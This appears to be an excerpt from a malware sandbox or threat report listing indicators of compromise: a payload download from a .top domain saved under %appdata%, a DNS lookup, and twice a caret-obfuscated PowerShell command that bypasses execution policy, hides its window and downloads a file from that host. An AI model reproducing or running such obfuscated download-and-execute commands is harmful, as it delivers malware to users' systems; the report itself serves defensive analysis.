Technical Information
- http://www.zoerpoled.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POw^ers^HelL^.^Exe ^-^ex^e^cU^TI^O^N^p^OlIC^Y^ BYPAss^ -^NOPr^o^FiLe^ -w^I^nDOwsTyl^E^ Hid^DE^n^ (NE^W^-oB^jeC^T^ S^y^S^tEM^.net.^w^eBC^L^IenT)^.^DO^wN^loADFIL^E^(^'http://ww...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "POw^ers^HelL^.^Exe ^-^ex^e^cU^TI^O^N^p^OlIC^Y^ BYPAss^ -^NOPr^o^FiLe^ -w^I^nDOwsTyl^E^ Hid^DE^n^ (NE^W^-oB^jeC^T^ S^y^S^tEM^.net.^w^eBC^L^IenT)^.^DO^wN^loADFIL^E^(^'http://ww...' (with hidden window)